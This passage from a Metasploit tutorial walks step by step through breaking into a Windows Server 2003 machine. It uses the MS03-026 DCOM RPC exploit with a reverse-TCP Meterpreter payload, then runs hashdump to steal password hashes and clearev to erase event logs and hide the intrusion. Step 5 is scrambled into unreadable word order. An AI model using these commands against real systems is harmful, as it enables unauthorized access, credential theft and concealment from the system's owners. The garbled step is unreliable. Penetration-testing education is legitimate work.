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(vii) set RHOST <hostname_or_ip> : This command will instruct Metasploit to target the specified remote host. (viii) set RPORT <host_port> : This command sets the port that Metasploit will connect to on the remote host. (ix) set PAYLOAD <generic/shell_bind_tcp> : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited. (x) set LPORT <local_port> : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server ( is not in use by another service and not reserved for administrative use), so set it to a random 4 digitnumber greater than 1024, and you should be fine. Youll have to change the number each time you successfully exploit a service as well. (xi) exploit : Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console (xii) help : The 'help' command will give you basic information of all the commands that are not listed out here. Now that you are ready with all the basic commands you need to launch your exploit , lets choose a couple of scenarios to get control of a remotely connected machine.
Victim MachineOS: Microsoft Windows Server 2003 IP: IP:
Attacker ( Our ) MachineOS: Backtrack 5 Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux Metasploit Version: Built in version of metasploit 3.8.0-dev IP:
ObjectiveThe only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.
Detailed Steps :
Step 1: Perform an Nmap scan of the remote server The output of the Nmap scan shows us a range of ports open which can be seen below in Figure 1.
Figure 1
We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable. Step 2: In your copy of BackTrack, go to: Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole
Figure 2
During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.
Figure 3
Step 3: Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit. To list out all the exploits supported by Metasploit we use the "show exploits" command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.
Figure 4
As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link or another alternative would be to use the "search <keyword>" command in Metasploit to search for related exploits for RPC. In msfconsole type "search dcerpc" to search all the exploits related to dcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.
Figure 5
Step 4: Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command "info exploit/windows/dcerpc/ms03_026_dcom" which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.
Figure 6
Step 5: The command "use <exploit_name>" In our case activates we the exploit use environment the for the exploit "use <exploit_name>. would command
Figure 7
From the above figure it is noticed the that, prompt after the use from of the to exploit "msf
Step 6: Now, we need to configure the exploit as per the need of the current scenario. The "show options" command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the "set RHOST" command. We enter the command "set RHOST" and we see that the RHOST is set to
Figure 8
Step 7: The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command. As shown in the below figure, "show payloads" command will list all payloads that are compatible with the selected exploit.
Figure 9
For our case, we are using the reverse tcp meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using "show options" to make sure all the compulsory sections are properly filled so that the exploit is launched properly.
Figure 10
We notice that the LHOST for out payload is not set, so we set it to out local IP ie. using the command "set LHOST" Step 8: Now that everything is ready and the exploit has been configured properly its time to launch the exploit. You can use the "check" command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it. In out case as shown in the Figure below, our selected exploit does not support the check option. [Figure 11]
Figure 11
The "exploit" command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.
Figure 12
The above figure shows that the exploit was successfully executed against the remote machine due to the vulnerable port 135. This is indicated by change in prompt to "meterpreter >". Step 9: Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server. We can use the "help" command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure. Below are the results of some of the meterpreter commands.
Figure 13
"ipconfig" prints the remote machines all current TCP/IP network configuration values "getuid" prints the server's username to he console. "hashdump" dumps the contents of the SAM database. "clearev" can be used to wipe off all the traces that you were ever on the machine.
Thus we have successfully used Metasploit framework to break into the remote Windows 2003 server and get shell access which can be used to control the remote machine and perform any kind of operations as per our wish.
This article provided a high-level introduction to using Metasploit to provide a generic overview of your system's vulnerabilities and this knowledge along with some more research can help you create your own exploits and perform Penetration Testing like never before.